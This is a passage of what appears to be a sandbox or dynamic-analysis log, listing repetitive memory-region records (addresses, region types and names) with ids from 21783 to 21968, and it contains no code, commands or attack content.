0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21791 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21792 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21793 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21794 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21795 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21796 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21797 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21801 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21802 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21803 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21804 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21805 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21807 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21808 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21810 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21811 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21812 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21813 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21814 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21815 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21816 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21817 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21818 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21819 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21820 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21821 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21822 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21823 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21824 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21825 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21826 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21827 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21828 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21829 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21830 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21831 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21832 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21833 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21834 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21841 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21845 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21852 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21853 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21856 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21857 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21858 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21859 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21860 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21863 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21864 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21865 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21866 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21867 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21870 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21871 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21872 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21873 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21874 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21875 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21876 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21877 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21878 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21879 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21880 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21881 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21882 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21883 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21884 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21887 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21888 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21889 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21890 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21891 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21892 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21893 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21894 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21895 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21896 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21897 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21898 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21899 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21900 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21901 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21902 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21904 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21905 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21906 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21908 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21909 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21910 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21911 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21912 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21913 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21914 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21915 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21916 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21917 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21918 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21919 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21920 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21921 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21922 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21923 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21924 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21925 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21926 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21927 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21928 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21929 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21930 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21931 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21932 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21933 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21934 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21935 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21936 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21937 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21938 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21939 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21940 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21941 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21942 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21943 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21944 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21945 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21946 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21947 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21948 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21949 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21950 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21951 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21952 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21953 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21954 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21955 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21956 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21957 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21958 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21961 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21962 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21963 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21965 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" 